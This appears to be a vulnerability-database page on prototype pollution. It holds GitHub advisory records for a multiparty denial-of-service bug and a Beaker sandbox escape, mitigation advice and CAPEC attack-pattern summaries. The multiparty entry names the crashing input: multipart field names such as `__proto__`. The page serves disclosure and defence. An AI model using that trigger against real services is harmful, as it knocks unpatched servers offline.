      "CWE-1321",
      "CWE-248"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-18T17:35:01Z",
    "nvd_published_at": "2026-05-12T10:16:48Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nmultiparty@4.2.3 and lower versions are vulnerable to denial of service via uncaught exception. By sending a `multipart/form-data` request with a field name that collides with an inherited `Object.prototype` property (e.g., `__proto__`, `constructor`, `toString`), the parser invokes `.push()` on the inherited prototype value rather than an array, throwing a `TypeError` that propagates as an uncaught exception and crashes the process. Any service accepting multipart uploads via multiparty is affected.\n\n### Patches\n\nUsers should upgrade to multiparty@4.3.0 or higher.\n\n### Workarounds\n\nNone.",
  "id": "GHSA-qxch-whhj-8956",
  "modified": "2026-05-18T17:35:01Z",
  "published": "2026-05-18T17:35:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pillarjs/multiparty/security/advisories/GHSA-qxch-whhj-8956"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8161"
    },
    {
      "type": "WEB",
      "url": "https://cna.openjsf.org/security-advisories.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pillarjs/multiparty"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pillarjs/multiparty/releases/tag/v4.3.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "multiparty: Denial of Service via Prototype Pollution leads to Uncaught Exception"
}

GHSA-QXVV-6MM7-75FH

Vulnerability from github – Published: 2022-05-24 17:16 – Updated: 2022-12-02 21:30
VLAI
Details

Beaker before 0.8.9 allows a sandbox escape, enabling system access and code execution. This occurs because Electron context isolation is not used, and therefore an attacker can conduct a prototype-pollution attack against the Electron internal messaging API.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-12079"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-20"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-04-23T04:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Beaker before 0.8.9 allows a sandbox escape, enabling system access and code execution. This occurs because Electron context isolation is not used, and therefore an attacker can conduct a prototype-pollution attack against the Electron internal messaging API.",
  "id": "GHSA-qxvv-6mm7-75fh",
  "modified": "2022-12-02T21:30:42Z",
  "published": "2022-05-24T17:16:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12079"
    },
    {
      "type": "WEB",
      "url": "https://github.com/beakerbrowser/beaker/issues/1519"
    },
    {
      "type": "WEB",
      "url": "https://github.com/beakerbrowser/beaker/releases/tag/0.8.9"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Implementation

By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.

Mitigation
Architecture and Design

By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.

Mitigation
Implementation

Strategy: Input Validation

When handling untrusted objects, validating using a schema can be used.

Mitigation
Implementation

By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.

Mitigation
Implementation

Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.

CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs

In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.

CAPEC-180: Exploiting Incorrectly Configured Access Control Security Levels

An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.